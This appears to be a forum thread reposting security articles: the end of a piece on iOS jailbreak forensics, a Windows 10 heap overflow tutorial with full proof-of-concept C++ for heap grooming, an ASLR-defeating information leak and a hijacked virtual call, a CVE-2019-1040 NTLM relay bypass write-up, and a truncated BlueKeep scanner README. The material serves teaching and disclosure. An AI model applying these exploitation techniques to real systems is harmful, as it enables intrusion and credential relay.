iTunes is still possible). Classic jailbreaks write files to the system partition to ensure that unsigned apps can be installed and launched. We can still access the full content of the data partition and decrypt the keychain without modifying the system partition. Modified boot image Early jailbreaks (up to and including jailbreaks targeting all versions of iOS 9) used to patch the kernel in order to achieve untethered jailbreak. While being “untethered” means the device remains jailbroken indefinitely between reboots, modifying the kernel has some severe disadvantages including compromised stability and general unreliability of jailbroken devices. Since Apple introduced advanced Kernel Patch Protection (KPP) mechanisms, patching the kernel became less attractive. Public jailbreaks targeting iOS 10 and all newer versions of iOS got away from patching the kernel. System log entries The installation and operation of a jailbreak leaves multiple traces in the form of entries in various log files throughout the system. This is pretty much unavoidable and should be taken into consideration. OTA compatibility Depending on the type of a jailbreak, a jailbroken device may or may not be able to accept over-the-air (OTA) updates after you’re done with extraction. Some classic jailbreaks make modifications to the device that make it impossible to install OTA updates even after the jailbreak is removed. Some jailbreaks make it possible to create a system restore point (using APFS mechanisms), so at least in theory rolling back the device to pre-jailbroken state should be possible. In our experience, this is not reliable enough. On the other hand, rootless jailbreaks to not alter the system partition at all, making OTA updates easily possible. Access to the root of the file system “/” Classic jailbreaks provide read/write access to the root of the file system, making it possible to dump the content of the system partition as well as the data partition. Rootless jailbreaks only offer access to the content of the data partition (“/var”), which is sufficient for the purpose of forensic extraction. Access to the data partition “/var” All types of jailbreaks offer access to user data stored in the data partition. The complete file system is available including installed applications and their sandboxed data, databases, system log files and much more. Access to keychain One can decrypt the keychain (passwords and autofill entries in Safari and installed apps) using either type of jailbreak. All keychain entries can be decrypted including those protected with the highest protection class and flagged this_device_only. Repeatable results Jailbreaks are unreliable in their nature. They are using undocumented exploits to obtain superuser privileges and secure access to the file system. A jailbreak may fail to install and require multiple attempts. Since jailbreaks modify the content of the device, we may not consider the results to be fully repeatable. However, rootless jailbreaks feature significantly cleaner footprint compared to classic ones. Conclusion Without a doubt, jailbreaks do have a fair share of forensic implications. One can significantly reduce the number and severity of negative consequences by selecting and using the jailbreak with care. However, even in worst-case scenarios, the benefits of physical extraction may far outweigh the drawbacks of jailbreaking. Sursa: https://blog.elcomsoft.com/2019/06/forensic-implications-of-ios-jailbreaking/
  23. Heap Overflow Exploitation on Windows 10 Explained Wei Chen Jun 12, 2019 14 min read POST STATS: 0 SHARE Introduction I remember the first time I attempted to exploit a memory corruption vulnerability. It was a stack buffer overflow example I tried to follow in this book called “Hacking: The Art of Exploitation.” I fought for weeks, and I failed. It wasn't until months later that I tried a different example on the internet and finally popped a shell. I was so thrilled I got it to work. More than 10 years later, I have some memory corruption exploits under my belt, from small-third-party applications to high-profile products such as Microsoft, Adobe, Oracle, Mozilla, and IBM. However, memory corruption for me is still quite a challenge, despite having a soft spot for it. And I don't think I'm the only person to feel this way. LiveOverflow, who is most well known for his hacking videos on YouTube, shares the same feeling about approaching browser exploitation in the early stage, saying: I know the theory. It's just a scary topic, and I don't even know where to start. My impression is that many people certainly feel this way about heap corruptions, which are indeed difficult because they are unpredictable in nature, and the mitigations are always evolving. About every couple of years, some major security improvement would be introduced, likely terminating a vulnerability class or an exploitation technique. Although a Black Hat talk may follow explaining that, those talks are probably overwhelming for the most part. People may get a grasp of the theory, it still remains a scary topic, and they still don't even know where to start. As LiveOverflow points out, there is a lot of value in explaining how you mastered something, more than just publishing an exploit. Being a former Corelan member, I know that some of the best exploit tutorials from Corelan started off this way, with Peter Van Eeckhoutte and his team researching the topic, documenting the process, and in the end, sharing that with the public. By doing so, you encourage the community to engage on the topic, and one day, someone is going to advance and share something new in return. Learning by creating Learning a vulnerability from a real application can be difficult because the codebase may be complex. Often, you may get away with examining a good crash, get EIP, add some shellcode, and get a working exploit, but you may not fully understand the actual problem as quickly. If the developers didn't spend just a few days building the codebase, there certainly isn't any magic to absorb so much internal knowledge about it in such a short amount of time. One way that guarantees I will learn about a vulnerability is by figuring out how to create it and mess with it. That's what we'll do today. Since heap corruption is such a scary topic, let's start with a heap overflow on Windows 10. Heap overflow example This is a basic example of a heap overflow. Clearly, it is trying to pass a size of 64 bytes to a smaller heap buffer that is only 32 bytes. #include <stdio.h> int main(int args, char** argv) { void* heap = (void*) malloc(32); memset(heap, 'A', 64); printf("%s\n", heap); free(heap); heap = NULL; return 0; } In a debugger, you will be presented with an error of 0xc0000374, indicating a heap corruption exception that is due to a failed inspection on the heap, resulting in a call to RtlpLogHeapFailure. A modern system is really good at protecting its heaps nowadays, and every time you see this function call is pretty much a sign that you have been defeated. Exploitability depends more on how much control you have on the application, and there is no silver bullet on the OS level like in previous years. Client-side applications (such as a browser, PDF, Flash, etc.) tend to be excellent targets due to the support of scripting languages. It’s very likely you have indirect control of an array, a HeapAlloc, a HeapFree, a vector, strings, etc., which are all good tools you need to instrument a heap corruption—except you have to find them. A difficult first step to success In C/C++ applications, a programming error may create opportunities like allowing the program to read the wrong memory, writing to the wrong place, or even executing the wrong code. Normally, we just call these conditions crashes, and there is actually an industry out there of people totally obsessed with finding and controlling them. By taking over the "bad" memory the program isn't supposed to read, we have witnessed Heartbleed. If the program writes to it, you have a buffer overflow. If you can combine all of them on a remote Windows machine, that's just as bad as EternalBlue. Whatever your exploit is, an important first step usually involves setting up the right environment in memory to land that attack. Kind of like in social engineering, you have this thing called pretexting. Well, in exploit writing, we have various names: Feng shui, massaging, grooming, etc. Every program loves a good massage, right? Windows 7 vs. Windows 10 The Windows 10 internals seem significantly different from their predecessors. You might have noticed some recent high-profile exploits that were all done against older systems. For example, Google Chrome's FileReader Use After Free was documented to work best on Windows 7, the BlueKeep RDP flaw was mostly proven in public to work on Windows XP, and Zerodium confirmed RCE on Windows 7. Predicable heap allocations is an important trait for heap grooming, so I wrote a test below for both systems. Basically, it creates multiple objects and tracks where they are. There is also a Summerize() method that tells me all the offsets found between two objects and the most common offset. void SprayTest() { OffsetTracker offsetTracker; LPVOID* objects = new LPVOID[OBJECT_COUNT]; for (int i = 0; i < OBJECT_COUNT; i++) { SomeObject* obj = new SomeObject(); objects[i] = obj; if (i > 0) { int offset = (int) objects[i] - (int) objects[i-1]; offsetTracker.Register(offset); printf("Object at 0x%08x. Offset to previous = 0x%08x\n", (int) obj, offset); } else { printf("Object at 0x%08x\n", (int) obj); } } printf("\n"); offsetTracker.Summerize(); The results for Windows 7: Basically, my test tool is suggesting that 97.8% of the time, my heap allocations look like this consecutively: [ Object ][ 0x30 of Bytes ][ Object ] For the exact same code, Windows 10 behaves very differently: Wow, only 6%. That means if I had an exploit, I wouldn't have any reliable layout to work with, and my best choice would make me fail 94% of the time. I might as well not write an exploit for it. The right way to groom As it turns out, Windows 10 requires a different way to groom, and it is slightly more complicated than before. After having multiple discussions with Peter from Corelan, the conclusion is that we shouldn’t bother using low-fragmentation heap, because that is what messing with our results. Front- vs. back-end allocator Low fragmentation heap is a way to allow the system to allocate memory in certain predetermined sizes. It means when the application asks for an allocation, the system returns the minimum available chunk that fits. This sounds really nice, except on Windows 10, it also tends to avoid giving you a chunk that has the same size as its neighbor. You can check whether a heap is being handled by LFH using the following in WinDBG: dt _HEAP [Heap Address] There is a field named FrontEndHeapType at offset 0x0d6. If the value is 0, it means the heap is handled by the backend allocator. 1 means LOOKASIDE. And 2 means LFH. Another way to check if a chunk belongs to LFH is: !heap -x [Chunk Address] The backend allocator is actually the default choice, and it takes at least 18 allocations to enable LFH. Also, those allocations don't have to be consecutive—they just need to be the same size. For example: #include <Windows.h> #include <stdio.h> #define CHUNK_SIZE 0x300 int main(int args, char** argv) { int i; LPVOID chunk; HANDLE defaultHeap = GetProcessHeap(); for (i = 0; i < 18; i++) { chunk = HeapAlloc(defaultHeap, 0, CHUNK_SIZE); printf("[%d] Chunk is at 0x%08x\n", i, chunk); } for (i = 0; i < 5; i++) { chunk = HeapAlloc(defaultHeap, 0, CHUNK_SIZE); printf("[%d] New chunk in LFH : 0x%08x\n", i ,chunk); } system("PAUSE"); return 0; } The code above produced the following results: The two loops do the same thing in code. The first iterates 18 times, and the second is five times. By observing those addresses, there are some interesting facts: In the first loop: Index 0 and index 1 have a huge gap of 0x1310 bytes. Starting index 2 to index 16, that gap is consistently 0x308 bytes. Index 16 and index 17 get a huge gap again with 0x3238 bytes. In the second loop: Index 0 is where LFH kicks in. Each gap is random, usually far away from each other. It appears the sweet spot where we have most control is between index 2 to 16 in the first loop, before LFH is triggered. The beauty of overtaking A feature of the Windows heap manager is that it knows how to reuse a freed chunk. In theory, if you free a chunk and allocate another for the exact same size, there is a good chance it will take over the freed space. Taking advantage of this, you could write an exploit without heap spraying. I can't say exactly who was the first person to apply this technique, but Peter Vreugdenhil from Exodus was certainly one of the first to talk about it publicly. See: HAPPY NEW YEAR ANALYSIS OF CVE-2012-4792. To verify this, let's write another C code: #include <Windows.h> #include <stdio.h> #define CHUNK_SIZE 0x300 int main(int args, char** argv) { int i; LPVOID chunk; HANDLE defaultHeap = GetProcessHeap(); // Trigger LFH for (i = 0; i < 18; i++) { HeapAlloc(defaultHeap, 0, CHUNK_SIZE); } chunk = HeapAlloc(defaultHeap, 0, CHUNK_SIZE); printf("New chunk in LFH : 0x%08x\n", chunk); BOOL result = HeapFree(defaultHeap, HEAP_NO_SERIALIZE, chunk); printf("HeapFree returns %d\n", result); chunk = HeapAlloc(defaultHeap, 0, CHUNK_SIZE); printf("Another new chunk : 0x%08x\n", chunk); system("PAUSE"); return 0; } On Windows 7, it seems this technique is legit (both addresses are the same): For the exact same code, the outcome is quite different on Windows 10: However, our hope is not lost. An interesting behavior by the Windows heap manager is that apparently for efficiency purposes, it can split a large free chunk in order to service smaller chunks the application requests. That means the smaller chunks may coalesce (merge), making them adjacent from each other. To achieve that, the overall steps kind of play out like the following. 1. Allocate chunks not handled by LFH Try to pick a size that is not used by the application, which tends to be a larger size. In our example, let's say our size choice is 0x300. Allocate no more than 18 chunks, probably a minimum of five. 2. Pick a chunk that you want to free The ideal candidate is obviously not the first chunk or the 18th chunk. The chunk you choose should have the same offset between its previous one and also the next one. So, that means you want to make sure you have this layout before you free the middle one: [ Chunk 1 ][ Chunk 2 ][ Chunk 3 ] 3. Make a hole By freeing the middle chunk, you technically create a hole that looks like this: [ Chunk 1 ][ Free chunk ][ Chunk 3 ] 4. Create smaller allocations for a coalescing miracle Usually, the ideal chunks are actually objects from the application. An ideal one, for example, is some kind of object with a size header you could modify. The structure of a BSTR fits perfectly for this scenario: [ 4 bytes (length prefix) ][ WCHAR* + \0 ] It may take some trials and errors to craft the right object size, and make them fall into the hole you created. If done right, within 10 allocations, at least one will fall into the hole, which creates this: [ Chunk 1 ][ BSTR ][ Chunk 3 ] 5. Repeat step 3 (another hole) Another hole will be used to place objects we want to leak. Your new layout might look like this: [ Chunk 1 ][ BSTR ][ Free Chunk ] 6. Repeat step 4 (creates objects to leak) In the last free chunk, we want to fill that with objects we wish to leak. To create these, you want to pick something that allows you control a heap allocation, where you can save pointers for the same object (which can be anything). A vector or something array-like would do great for this kind of job. Once again, you may need to experiment with different sizes to find the one that wants to be in the hole. The new allocation should take over the last chunk like so: [ Chunk 1 ][ BSTR ][ Array of pointers ] The implementation This proof-of-concept demonstrates how the above procedure may be implemented in C++: #include <Windows.h> #include <comdef.h> #include <stdio.h> #include <vector> using namespace std; #define CHUNK_SIZE 0x190 #define ALLOC_COUNT 10 class SomeObject { public: void function1() {}; virtual void virtual_function1() {}; }; int main(int args, char** argv) { int i; BSTR bstr; HANDLE hChunk; void* allocations[ALLOC_COUNT]; BSTR bStrings[5]; SomeObject* object = new SomeObject(); HANDLE defaultHeap = GetProcessHeap(); for (i = 0; i < ALLOC_COUNT; i++) { hChunk = HeapAlloc(defaultHeap, 0, CHUNK_SIZE); memset(hChunk, 'A', CHUNK_SIZE); allocations[i] = hChunk; printf("[%d] Heap chunk in backend : 0x%08x\n", i, hChunk); } HeapFree(defaultHeap, HEAP_NO_SERIALIZE, allocations[3]); for (i = 0; i < 5; i++) { bstr = SysAllocString(L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); bStrings[i] = bstr; printf("[%d] BSTR string : 0x%08x\n", i, bstr); } HeapFree(defaultHeap, HEAP_NO_SERIALIZE, allocations[4]); int objRef = (int) object; printf("SomeObject address for Chunk 3 : 0x%08x\n", objRef); vector<int> array1(40, objRef); vector<int> array2(40, objRef); vector<int> array3(40, objRef); vector<int> array4(40, objRef); vector<int> array5(40, objRef); vector<int> array6(40, objRef); vector<int> array7(40, objRef); vector<int> array8(40, objRef); vector<int> array9(40, objRef); vector<int> array10(40, objRef); system("PAUSE"); return 0; } For debugging reasons, the program logs where the allocations are when you run it: To verify things are in the right place, we can look at it with WinDBG. Our proof-of-concept actually aims index 2 as the BSTR chunk, so we can check the memory dump for that: It looks like we have executed that well—all three chunks are arranged correctly. If you have read this far without falling asleep, congratulations! We are finally ready to move on and talk about everyone's favorite part of exploitation, which is overflowing the heap (on Windows 10). Exploiting heap overflow I think at this point, you might have guessed that the most painful part about overflowing the heap isn't actually overflowing the heap. It is the time and effort it takes to set up the desired memory layout. By the time you are ready to exploit the bug, you are already mostly done with it. It would be fair to say that the more preparation you do on grooming, the more reliable it is. To recap, before you are ready to exploit a heap overflow to cause an information leak, you want to make sure you have control of a layout that should be similar to this for an information leak: [ Chunk 1 ][ BSTR ][ Array of pointers ] A precise overwrite For this exploitation scenario, the most important objective for our heap overflow is actually this: Precisely overwrite the BSTR length. The length field is a four-byte value found before the BSTR string: In this example, you want to change the hex value 0xF8 to something bigger like 0xFF, which allows the BSTR to read 255 bytes. It is more than enough to read past the BSTR and collect data in the next chunk. Your code may look like this: As far as the application is concerned, the BSTR now contains some pointers we want. We are finally ready to claim our reward. Reading the leaked data When you are reading the BSTR with vftable pointers in it, you want to figure out exactly where those four bytes are, then substring it. With these four raw bytes you have leaked, you want to convert them into an integer value. The following example demonstrates how to do that: std::wstring ws(bStrings[0], strSize); std::wstring ref = ws.substr(120+16, 4); char buf[4]; memcpy(buf, ref.data(), 4); int refAddr = int((unsigned char)(buf[3]) << 24 | (unsigned char)(buf[2]) << 16 | (unsigned char)(buf[1]) << 8 | (unsigned char)(buf[0])); Other languages would really approach conversion in a similar way. Since JavaScript is quite a popular tool for heap exploitation, here's another example to demonstrate: var bytes = "AAAA"; var intVal = bytes.charCodeAt(0) | bytes.charCodeAt(1) << 8 | bytes.charCodeAt(2) << 16 | bytes.charCodeAt(3) << 24; // This gives you 1094795585 console.log(intVal); Once you have the vftable address, you can use that to calculate the image's base address. An interesting piece of information you want to know is that the location of vftables are predetermined in the .rdata section, which means as long as you don't recompile, your vftable should stay there: This makes calculating the image base address a lot easier: Offset to Image Base = VFTable - Image Base Address For the final product for our information leak, here's the source code: #include <Windows.h> #include <comdef.h> #include <stdio.h> #include <vector> #include <string> #include <iostream> using namespace std; #define CHUNK_SIZE 0x190 #define ALLOC_COUNT 10 class SomeObject { public: void function1() {}; virtual void virtual_function1() {}; }; int main(int args, char** argv) { int i; BSTR bstr; BOOL result; HANDLE hChunk; void* allocations[ALLOC_COUNT]; BSTR bStrings[5]; SomeObject* object = new SomeObject(); HANDLE defaultHeap = GetProcessHeap(); if (defaultHeap == NULL) { printf("No process heap. Are you having a bad day?\n"); return -1; } printf("Default heap = 0x%08x\n", defaultHeap); printf("The following should be all in the backend allocator\n"); for (i = 0; i < ALLOC_COUNT; i++) { hChunk = HeapAlloc(defaultHeap, 0, CHUNK_SIZE); memset(hChunk, 'A', CHUNK_SIZE); allocations[i] = hChunk; printf("[%d] Heap chunk in backend : 0x%08x\n", i, hChunk); } printf("Freeing allocation at index 3: 0x%08x\n", allocations[3]); result = HeapFree(defaultHeap, HEAP_NO_SERIALIZE, allocations[3]); if (result == 0) { printf("Failed to free\n"); return -1; } for (i = 0; i < 5; i++) { bstr = SysAllocString(L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); bStrings[i] = bstr; printf("[%d] BSTR string : 0x%08x\n", i, bstr); } printf("Freeing allocation at index 4 : 0x%08x\n", allocations[4]); result = HeapFree(defaultHeap, HEAP_NO_SERIALIZE, allocations[4]); if (result == 0) { printf("Failed to free\n"); return -1; } int objRef = (int) object; printf("SomeObject address : 0x%08x\n", objRef); printf("Allocating SomeObject to vectors\n"); vector<int> array1(40, objRef); vector<int> array2(40, objRef); vector<int> array3(40, objRef); vector<int> array4(40, objRef); vector<int> array5(40, objRef); vector<int> array6(40, objRef); vector<int> array7(40, objRef); vector<int> array8(40, objRef); vector<int> array9(40, objRef); vector<int> array10(40, objRef); UINT strSize = SysStringByteLen(bStrings[0]); printf("Original String size: %d\n", (int) strSize); printf("Overflowing allocation 2\n"); char evilString[] = "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "CCCCDDDD" "\xff\x00\x00\x00"; memcpy(allocations[2], evilString, sizeof(evilString)); strSize = SysStringByteLen(bStrings[0]); printf("Modified String size: %d\n", (int) strSize); std::wstring ws(bStrings[0], strSize); std::wstring ref = ws.substr(120+16, 4); char buf[4]; memcpy(buf, ref.data(), 4); int refAddr = int((unsigned char)(buf[3]) << 24 | (unsigned char)(buf[2]) << 16 | (unsigned char)(buf[1]) << 8 | (unsigned char)(buf[0])); memcpy(buf, (void*) refAddr, 4); int vftable = int((unsigned char)(buf[3]) << 24 | (unsigned char)(buf[2]) << 16 | (unsigned char)(buf[1]) << 8 | (unsigned char)(buf[0])); printf("Found vftable address : 0x%08x\n", vftable); int baseAddr = vftable - 0x0003a490; printf("====================================\n"); printf("Image base address is : 0x%08x\n", baseAddr); printf("====================================\n"); system("PAUSE"); return 0; } And FINALLY, let's witness the sweet victory: After the leak By leaking the vftable and image address, exploiting the application at this point would be a lot like the pre-ASLR era, with the only thing left that stands between you and a shell is DEP. You can easily collect some ROP gadgets utilizing the leak, defeat DEP, and get the exploit to work. One thing to keep in mind is that no matter what DLL (image) you choose to collect the ROP gadgets, there may be multiple versions of that DLL that are used by end users around the world. There are ways to overcome this. For example, you could write something that scans the image for the ROP gadgets you need. Or, you could collect all the versions you can find for that DLL, create ROPs for them, and then use the leak to check which version of DLL your exploit is using, and then return the ROP chain accordingly. Other methods are also possible. Arbitrary code execution Now that we are done with the leak, we are one big step closer to get arbitrary code execution. If you managed to read through the process on how to use a heap overflow to leak data, this part isn't such a stranger to you after all. Although there are multiple ways to approach this problem, we can actually borrow the same idea from the leak technique and get an exploitable crash. One of the magic tricks lies within the behavior of a vector. In C++, a vector is a dynamic array that grows or shrinks automatically. A basic example looks like this: #include <vector> #include <string> #include <iostream> using namespace std; int main(int args, char** argv) { vector<string> v; v.push_back("Hello World!"); cout << v.at(0) << endl; return 0; } It is a wonderful tool for exploits because of the way it allows us to create an arbitrary sized array that contains pointers we control. It also saves the content on the heap, so that means you can use this to make heap allocations, something you already have seen in the information leak examples. Borrowing this idea, we could come up with a strategy like this: Create an object. Similar to the leak setup, allocate some chunks no more than 18 (to avoid LFH). Free one of the chunks (somewhere between the 2nd or the 16th) Create 10 vectors. Each is filled with pointers to the same object. You may need to play with the size to figure out exactly how big the vectors should be. Hopefully, the content from one of the vectors will take over the freed chunk. Overflow the chunk that's found before the freed one. Use the object that the vector holds. The implementation of the above strategy looks something like this: #include <Windows.h> #include <stdio.h> #include <vector> using namespace std; #define CHUNK_SIZE 0x190 #define ALLOC_COUNT 10 class SomeObject { public: void function1() { }; virtual void virtualFunction() { printf("test\n"); }; }; int main(int args, char** argv) { int i; HANDLE hChunk; void* allocations[ALLOC_COUNT]; SomeObject* objects[5]; SomeObject* obj = new SomeObject(); printf("SomeObject address : 0x%08x\n", obj); int vectorSize = 40; HANDLE defaultHeap = GetProcessHeap(); for (i = 0; i < ALLOC_COUNT; i++) { hChunk = HeapAlloc(defaultHeap, 0, CHUNK_SIZE); memset(hChunk, 'A', CHUNK_SIZE); allocations[i] = hChunk; printf("[%d] Heap chunk in backend : 0x%08x\n", i, hChunk); } HeapFree(defaultHeap, HEAP_NO_SERIALIZE, allocations[3]); vector<SomeObject*> v1(vectorSize, obj); vector<SomeObject*> v2(vectorSize, obj); vector<SomeObject*> v3(vectorSize, obj); vector<SomeObject*> v4(vectorSize, obj); vector<SomeObject*> v5(vectorSize, obj); vector<SomeObject*> v6(vectorSize, obj); vector<SomeObject*> v7(vectorSize, obj); vector<SomeObject*> v8(vectorSize, obj); vector<SomeObject*> v9(vectorSize, obj); vector<SomeObject*> v10(vectorSize, obj); printf("vector : 0x%08x\n", v1); printf("vector : 0x%08x\n", v2); printf("vector : 0x%08x\n", v3); printf("vector : 0x%08x\n", v4); printf("vector : 0x%08x\n", v5); printf("vector : 0x%08x\n", v6); printf("vector : 0x%08x\n", v7); printf("vector : 0x%08x\n", v8); printf("vector : 0x%08x\n", v9); printf("vector : 0x%08x\n", v10); memset(allocations[2], 'B', CHUNK_SIZE + 8 + 32); v1.at(0)->virtualFunction(); system("PAUSE"); return 0; } Since the content of the vector (that fell into the hole) is overwritten with data we control, if there is some function that wants to use it (which expects to print "test"), we end up getting a good crash that is exploitable, which can be chained with the information leak to build a full-blown exploit. Summary Modern heap exploitation is a fascinating and difficult subject to master. It takes a lot of time and effort to reverse engineer the internals of the application before you know what you can leverage to instrument the corruption. Most of us can be easily overwhelmed by this, and sometimes we end up feeling like we know almost nothing about the subject. However, since most memory corruption problems are based on C/C++, you can build your own vulnerable cases to experience them. That way, when you face a real CVE, it is no longer a scary topic: You know how to identify the primitives, and you have given yourself a shot at exploiting the CVE. And maybe, one day when you discover something cool, give back to the community that taught you how to be where you are today. Special thanks to Steven Seeley (mr_me) and Peter Van Eeckhoutte (Corelanc0d3r). Sursa: https://blog.rapid7.com/2019/06/12/heap-overflow-exploitation-on-windows-10-explained/
  24. Drop the MIC - CVE-2019-1040 Posted by Marina Simakov on Jun 11, 2019 9:52:17 AM Find me on: LinkedIn Twitter As announced in our recent security advisory, Preempt researchers discovered how to bypass the MIC (Message Integrity Code) protection on NTLM authentication and modify any field in the NTLM message flow, including the signing requirement. This bypass allows attackers to relay authentication attempts which have negotiated signing to another server while entirely removing the signing requirement. All servers which do not enforce signing are vulnerable. Background NTLM relay is one of the most prevalent attacks on Active Directory environments. The most significant mitigation against this attack technique is server signing. However, by default, only domain controllers enforce SMB signing, which in many cases leaves other sensitive servers vulnerable. However, in order to compromise such a server, attackers would need to capture an NTLM negotiation which does not negotiate signing, which is the case in HTTP but not in SMB, where by default if both parties support signing, the session would necessarily be signed. In order to ensure that the NTLM negotiation stage is not tampered with by attackers, Microsoft added an additional field in the final NTLM authentication message - the MIC. However, we discovered that until Microsoft’s latest security patch, this field was useless, which enabled the most desired relay scenario of all - SMB to SMB relay. Session Signing When users authenticate to a target via NTLM, they may be vulnerable to relay attacks. In order to protect servers from such attacks, Microsoft has introduced various mitigations, the most significant of which is session signing. When users establish a signed session against a server, attackers cannot hijack the session due to their inability to retrieve the required session key. In SMB, session signing is negotiated by setting the ‘NTLMSSP_NEGOTIATE_SIGN’ flag in the NTLM_NEGOTIATE message. The client behavior is determined by several group policies (‘Microsoft network client: Digitally sign communications’), for which the default configuration is to set the flag in question. If attackers attempt to relay such an NTLM authentication, they will need to ensure that signing is not negotiated. One way to do so is by relaying to protocols in which NTLM messages don’t govern the session integrity, such as LDAPS or HTTPS. However, these protocols are not open on every machine, as opposed to SMB which is enabled by default on all Windows machines and, in many cases, allows to remotely execute code. Consequently, the holy grail of NTLM relay attacks lies in relaying SMB authentication requests to other SMB servers. In order to successfully perform such NTLM relay, the attackers will need to modify the NTLM_NEGOTIATE message and unset the ‘NTLMSSP_NEGOTIATE_SIGN’ flag. However, in new NTLM versions there is a protection against such modifications - the MIC field. Figure 1 - The NTLM_NEGOTIATE message dictates whether to negotiate SMB signing MIC Overview An NTLM authentication consists of 3 message types: NTLM_NEGOTIATE, NTLM_CHALLENGE, NTLM_AUTHENTICATE. To ensure that the messages were not manipulated in transit by a malicious actor, an additional MIC (Message Integrity Code) field has been added to the NTLM_AUTHENTICATE message. The MIC is an HMAC_MD5 applied to the concatenation of all 3 NTLM messages using the session key, which is known only to the account initiating the authentication and the target server. Hence, an attacker which tries to tamper with one of the messages (for example, modify the signing negotiation), would not be able to generate a corresponding MIC, which would cause the attack to fail. Figure 2 - The ‘MIC’ field protects from NTLM messages modification The presence of the MIC is announced in the ‘msvAvFlag’ field in the NTLM_AUTHENTICATE message (flag 0x2 indicates that the message includes a MIC) and it should fully protect servers from attackers which attempt to remove the MIC and perform NTLM relay. However, we found out that Microsoft servers do not take advantage of this protection mechanism and allow for unsigned (MIC-less) NTLM_AUTHENTICATE messages. Figure 3 - The ‘flags’ field indicating that the NTLM_AUTHENTICATE message includes a MIC Drop The MIC We discovered that all NTLM authentication requests are susceptible to relay attacks, no matter which protocol carries them. If the negotiation request includes a signing requirement, attackers would need to perform the following in order to overcome the protection of the MIC: Unset the signing flags in the NTLM_NEGOTIATE message (NTLMSSP_NEGOTIATE_ALWAYS_SIGN, NTLMSSP_NEGOTIATE_SIGN) Remove the MIC from the NTLM_AUTHENTICATE message Remove the version field from the NTLM_AUTHENTICATE message (removing the MIC field without removing the version field would result in an error). Unset the following flags in the NTLM_AUTHENTICATE message: NTLMSSP_NEGOTIATE_ALWAYS_SIGN, NTLMSSP_NEGOTIATE_SIGN, NEGOTIATE_KEY_EXCHANGE, NEGOTIATE_VERSION. We believe that this is a serious attack vector which breaks the misconception that the MIC protects an NTLM authentication in any way. We believe that the issue lies in the fact that the target server which accepts an authentication with an ‘msvAvFlag’ value indicating that the authentication carries a MIC, does not in fact verify the presence of this field. This leaves all servers which do not enforce server signing (which in most organizations means the vast majority of servers since by default only domain controllers enforce SMB signing) vulnerable to NTLM relay attacks. This attack does not only allow attackers to overcome the session signing negotiation, but also leaves the organization vulnerable to much more complicated relay attacks which manipulate the NTLM messages in transit to overcome various security setting such as EPA (Enhanced Protection for Authentication). For more details on this attack refer to the following blog. In order to truly protect your servers from NTLM relay attacks, enforce signing on all your servers. If such a configuration is too strict for your environment, try to configure this setting on as many of your sensitive servers. Microsoft has release the following fix: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1040 How Preempt can Help Preempt constantly works to protect its customers. Customers who have deployed Preempt have been consistently protected from NTLM relay attacks. The Preempt Platform provides full network NTLM visibility, allowing you to reduce NTLM traffic and analyze suspicious NTLM activity. In addition, Preempt has innovative industry-first deterministic NTLM relay detection capabilities and has the ability to inspect all GPO configurations and will alert on insecure configurations. For non-Preempt customers, this configuration inspection is also available in Preempt Lite, a free lightweight version of the Preempt Platform. You can download Preempt Lite here and verify which areas of your network are vulnerable. Topics: NTLM, Security Advisory, Microsoft Sursa: https://blog.preempt.com/drop-the-mic
  25. Nytro

    BKScan

    BKScan BlueKeep (CVE-2019-0708) scanner that works both unauthenticated and authenticated (i.e. when Network Level Authentication (NLA) is enabled). Requirements: A Windows RDP server If NLA is enabled on the RDP server, a valid user/password that is part of the "Remote Desktop Users" group It is based on FreeRDP and uses Docker to ease compilation/execution. It should work on any UNIX environment and has been tested mainly on Linux/Ubuntu. Usage Building Install pre-requisites: sudo apt-get install docker.io Build the custom FreeRDP client inside the Docker container named bkscan: $ git clone https://github.com/nccgroup/BKScan.git $ cd BKScan $ sudo docker build -t bkscan . [...] Successfully built f7666aeb3259 Successfully tagged bkscan:latest Running Invoke the bkscan.sh script from your machine. It will invoke the custom FreeRDP client inside the newly created bkscan Docker container: $ sudo ./bkscan.sh -h Usage: ./bkscan.sh -t <target_ip> [-P <target_port>] [-u <user>] [-p <password>] [--debug] Target with NLA enabled and valid credentials Against a vulnerable Windows 7 with NLA enabled and valid credentials. $ sudo ./bkscan.sh -t 192.168.119.141 -u user -p password [+] Targeting 192.168.119.141:3389... [+] Using provided credentials, will support NLA [-] Max sends reached, please wait to be sure... [!] Target is VULNERABLE!!! Against a Windows 10 (non-vulnerable) or patched Windows 7 with NLA enabled and valid credentials: $ sudo ./bkscan.sh -t 192.168.119.133 -u user -p password [+] Targeting 192.168.119.133:3389... [+] Using provided credentials, will support NLA [-] Max sends reached, please wait to be sure... [*] Target appears patched. Target with NLA enabled and non-valid credentials Against a Windows 7 (vulnerable or patched) which NLA enabled but that we are scanning with a client without NLA support: $ sudo ./bkscan.sh -t 192.168.119.141 [+] Targeting 192.168.119.141:3389... [+] No credential provided, won't support NLA [-] Connection reset by peer, NLA likely to be enabled. Detection failed. Against a Windows 7 (vulnerable or patched) with NLA enabled and valid credentials but user is not part of the "Remote Desktop Users" group: $ sudo ./bkscan.sh -t 192.168.119.141 -u test -p password [+] Targeting 192.168.119.141:3389... [+] Using provided credentials, will support NLA [-] NLA enabled, credentials are valid but user has insufficient 